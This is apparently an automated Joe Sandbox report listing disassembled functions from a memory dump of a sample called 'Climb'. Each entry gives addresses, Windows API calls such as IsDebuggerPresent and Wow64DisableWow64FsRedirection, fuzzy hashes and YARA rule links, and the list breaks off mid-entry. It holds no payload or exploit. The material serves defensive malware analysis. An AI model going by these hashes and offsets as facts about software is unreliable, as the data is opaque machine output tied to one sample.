API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: f78320d7e406e836e7e7274e9fb081bfc49c62e92c6bd0702b87f92b747f4fee
Instruction ID: e7331bf91f9755a6cf6c8226f645922587eb88a35ea2835b7dd0404b04283736
Opcode Fuzzy Hash: f78320d7e406e836e7e7274e9fb081bfc49c62e92c6bd0702b87f92b747f4fee
Instruction Fuzzy Hash: 92F05E346043859BEB748BA0DC49FEA33ECEB45345F104928E259934D0DB7095888B26

Function 000C2B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 000C3006

Strings

CALL, xrefs: 000C2FD6

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 5a9c56c0b0c4f56dba5b3ca16b51a2bb28392b4aa1b0401f23d7e0f3ef8a9e6e
Instruction ID: dda2961846b58bab06c111200b3ac1ccbe0c23b0ce66647b2f2a3ce5ea052499
Opcode Fuzzy Hash: 5a9c56c0b0c4f56dba5b3ca16b51a2bb28392b4aa1b0401f23d7e0f3ef8a9e6e
Instruction Fuzzy Hash: EF2278706083019FC724DF24C884F6EBBE1BF98314F24895DF49A8B6A2D772E941CB52

Function 000C1990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 940757fdc9dacdd75ebe910ed325f42228c7db4f88582ea41c608d2f7fa61ffc
Instruction ID: 11a2f0a49ad04acde9fae9008d56df2ed69ba9faa96903b2bf6525a243613f7a
Opcode Fuzzy Hash: 940757fdc9dacdd75ebe910ed325f42228c7db4f88582ea41c608d2f7fa61ffc
Instruction Fuzzy Hash: 5032CC70A00215DFCB24EF54C881FEEB7B4EF15314F148559E89AAB2A2E7B1ED50CB91

Function 000B3A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 000F413B

Part of subcall function 000B5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000B55D1,?,?,000F4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 000B5871

Part of subcall function 000B3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 000B3A76

Strings

X, xrefs: 000F4109

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: ebe4ec52f866ab15eb0f3de9d4696e9c99d0e2926132a61931a8d728c4c62ac5
Instruction ID: fedbfada365508b293f801c65d94d38d4a570fbf50fa3f21a823127772c86d81
Opcode Fuzzy Hash: ebe4ec52f866ab15eb0f3de9d4696e9c99d0e2926132a61931a8d728c4c62ac5
Instruction Fuzzy Hash: 27219371A002589BDB11DF94D805BEE7BFCAF49304F108059E545B7282DFB49A898F61

Function 000B396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 000B3A3C

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 0066b9b731fddd7370d738a3ec83fca25a06d56345cbb541f8942c343563a4e5
Instruction ID: 55a95782a5bf07aec6b96fb06a626b3a5d989b0a55cc70088845ec11552554af
Opcode Fuzzy Hash: 0066b9b731fddd7370d738a3ec83fca25a06d56345cbb541f8942c343563a4e5
Instruction Fuzzy Hash: 6031D2706047018FD361DF24D8947D7BBE8FB49308F10092EEAD987641E7B5AA88CB52

Function 000B331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 000B333D

Part of subcall function 000B32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 000B32FB
Part of subcall function 000B32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000B3312

Part of subcall function 000B338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,000B3368,?), ref: 000B33BB
Part of subcall function 000B338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,000B3368,?), ref: 000B33CE
Part of subcall function 000B338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00182418,00182400,?,?,?,?,?,?,000B3368,?), ref: 000B343A
Part of subcall function 000B338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00182418,?,?,?,?,?,?,?,000B3368,?), ref: 000B34BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 000B3377

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: ad45db6a4c6f5ec06c0be5577e92e18b6a73213c80dd8a719dbb7722b29802dc
Instruction ID: 607af1f98a0f829c388f43429dd1782b742b6e920f6e38e6d9859d8bbcb20a1a
Opcode Fuzzy Hash: ad45db6a4c6f5ec06c0be5577e92e18b6a73213c80dd8a719dbb7722b29802dc
Instruction Fuzzy Hash: 02F05E31554744AFD7026F60FE1ABA537E0B709B1AF144816FE088A9E3CBBA93D18B50

Function 000CFFE0 Relevance: 2.6, APIs: 2, Instructions: 94sleepCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 000D007D
Sleep.KERNEL32 ref: 000D008F

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CloseHandleSleep
String ID:
API String ID: 252777609-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 76855bf556a9725c24be06c659a4d552f4372f7c31ad6852736516dc86473637
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 5831C070A00205EBC758DF58D484B69FBA6FB49300F2886A6E409CB352D772EDC1CBE0

Function 000BCAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 000BCEEE

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 83d752f47645f603928c24cecfdc8cce6cf44fe0f0b4d7f9171a3b7aaf192c2a
Instruction ID: 5d4b5fad2720cf6aabdcce32c3737c3029166e0af45f308fde1fe230500e6b02
Opcode Fuzzy Hash: 83d752f47645f603928c24cecfdc8cce6cf44fe0f0b4d7f9171a3b7aaf192c2a
Instruction Fuzzy Hash: 3132AE74A00205AFEB24CF54C884EFEBBB5FF45314F198069E956AB291C7B4EE85CB50

Function 00137AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 468032858832d5a57f84f0393167c9af3b57b104d14be06f7ce5b6e05e49b31a
Instruction ID: 172203385cf851adc5c39073df596fd8ce00bb9d1fbd40aab1426cf0fd2fbcd8
Opcode Fuzzy Hash: 468032858832d5a57f84f0393167c9af3b57b104d14be06f7ce5b6e05e49b31a
Instruction Fuzzy Hash: 71D14D74A04209EFCF24EF98D8819EDBBB5FF58310F144169E915AB292DB31AE51CF90

Function 000DF106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25f15354a177379dd4e14ba3b17caa539165566c44029354076ee5bc45d8954c
Instruction ID: 159716c2c10475186d8073e2bcac665b98879c5118c8fe8663807666e195810b
Opcode Fuzzy Hash: 25f15354a177379dd4e14ba3b17caa539165566c44029354076ee5bc45d8954c
Instruction Fuzzy Hash: 4151F935A00345AFDB10DF68C840AB97BE5EF85364F19C16AE84A9B392D771ED42CB60

Function 0011FCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0011FCCE

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: cd5dfceb36de1792fab94ddaf5f5f7e90d650b9ff5a26cbf9db0571301d00342
Instruction ID: 436f7d09243b4081e50678cc9ddf79e7b9e1017598e829bd56b8625303220f8e
Opcode Fuzzy Hash: cd5dfceb36de1792fab94ddaf5f5f7e90d650b9ff5a26cbf9db0571301d00342
Instruction Fuzzy Hash: 3141B3B6500209AFCB19EFA8D8819EEB7B8FF44314F21453EE51697251EB70DE86CB50

Function 000B6679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 000B663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,000B668B,?,?,000B62FA,?,00000001,?,?,00000000), ref: 000B664A
Part of subcall function 000B663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000B665C
Part of subcall function 000B663E: FreeLibrary.KERNEL32(00000000,?,?,000B668B,?,?,000B62FA,?,00000001,?,?,00000000), ref: 000B666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,000B62FA,?,00000001,?,?,00000000), ref: 000B66AB

Part of subcall function 000B6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,000F5657,?,?,000B62FA,?,00000001,?,?,00000000), ref: 000B6610
Part of subcall function 000B6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000B6622
Part of subcall function 000B6607: FreeLibrary.KERNEL32(00000000,?,?,000F5657,?,?,000B62FA,?,00000001,?,?,00000000), ref: 000B6635

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 7693417b33c6fbd86a41ca5d154c44617f3d029d113053de36325ad54fa1afb0
Instruction ID: 77b378e77b063619b57c702dfba809cdff4a591b492e02f90745101f91583699
Opcode Fuzzy Hash: 7693417b33c6fbd86a41ca5d154c44617f3d029d113053de36325ad54fa1afb0
Instruction Fuzzy Hash: E5112376600205AACF24BB20DC02BED7BA19F50701F10442EF552AB1C3EFBBDA04AB60

Function 000E8782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 000E87C0

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: a700756c5c1eccceecf30c26d477b28ca336e25c30ec4419f42f311c7709e8db
Instruction ID: 6f0e6a88ee2d3985a503734716a054316be1b82e397bca33b71c05126580a617
Opcode Fuzzy Hash: a700756c5c1eccceecf30c26d477b28ca336e25c30ec4419f42f311c7709e8db
Instruction Fuzzy Hash: 01112A7690410AAFCF15DF99E9459DE7BF8EF48310F1180A9F809AB312DA31EA11CB65

Function 000E5373 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000E4FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,000E319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 000E5031

_free.LIBCMT ref: 000E53DF

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction ID: f1fb883a43db5ba05d7996bae6feb7bd6c948bb27397cf2d1be9f18d2ef12469
Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
Instruction Fuzzy Hash: A8012B722003446FE3318E66DC4195AFBEDEB85370F25091DE58493281EA7069058764

Function 000DE972 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction ID: 1d7dd295140756135485b45c048f08b92d089f7159513016a6431d9801d8adb8
Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
Instruction Fuzzy Hash: F3F0F9325027505AD6713A2BDC117DA72988F42334F104B27F525AB3D3DB70E80186B2

Function 0012F94A Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0012F987

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 250db6f4bd86e00addd41352c5d49cf30c1856f92db05780ad7029da57f4193e
Instruction ID: aac46feac910c87d13e4423dd06a1c738a9b62d8d18f332afbd9e62e53ae1e9c
Opcode Fuzzy Hash: 250db6f4bd86e00addd41352c5d49cf30c1856f92db05780ad7029da57f4193e
Instruction Fuzzy Hash: 2FF03C76A00214BFCB01EBA5DC46EDE77B8EF99720F004055F5099B362EA70EE81CB61

Function 000E4FF0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,000E319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 000E5031

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: edfa84e66728a2b7d61b70ccd1608c4b82127234ebd7a136b8c47ec1e436a7b5
Instruction ID: 7ccf958cdf0ca97e840b4da74c69d4e0ee43dc4aaf6e879d3dff8dd5eba2f112
Opcode Fuzzy Hash: edfa84e66728a2b7d61b70ccd1608c4b82127234ebd7a136b8c47ec1e436a7b5
Instruction Fuzzy Hash: 3FF0E236611F60AFDB716A67DC05FAA3788AF417F6F158822FC14BB1A1DA30D80186F0

Function 000E3B93 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,000D6A79,?,0000015D,?,?,?,?,000D85B0,000000FF,00000000,?,?), ref: 000E3BC5

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5bab2753cf6eb2a53175a2e1e1b5bd028f4058279d0cdb7a26e6320a0ec13cdb
Instruction ID: 555d880e78b264af5d6e7fd7bcb288711c85a5bba45e803212f627b589554196
Opcode Fuzzy Hash: 5bab2753cf6eb2a53175a2e1e1b5bd028f4058279d0cdb7a26e6320a0ec13cdb
Instruction Fuzzy Hash: A1E06531240BA16EDA7126779C09FAA7E88AF417A0F550161EE17B7991DB70CE4085B0

Function 000B66E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d7171f0147519ace767953f33a45219aafe3a0aed83f32eead2bf3aec7c3963
Instruction ID: 8fcb6966b4102606a0735c70c257ba97705a68b2e48e6a6bc2bbfbfbfc5bbd4b
Opcode Fuzzy Hash: 9d7171f0147519ace767953f33a45219aafe3a0aed83f32eead2bf3aec7c3963
Instruction Fuzzy Hash: 93F03071105701CFCB749F64D8A0866B7E4BF1431A314897EE6D687A10C7369840DF50

Function 00106AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00106AE0

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: ab1ab4c39556fd2c9a8fa667a8c981ea54b907d022af5f7996236e777b7c66e2
Instruction ID: 0df0439231a6edfa1a7b2f284b2c231a87b1d59fd419a544de6541cfe61f9c4d
Opcode Fuzzy Hash: ab1ab4c39556fd2c9a8fa667a8c981ea54b907d022af5f7996236e777b7c66e2
Instruction Fuzzy Hash: B2F065B1704205AAD7305BE49805BF9F7E8EB11315F14451ED4D9C31C2DBF654E49761

Function 000B684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

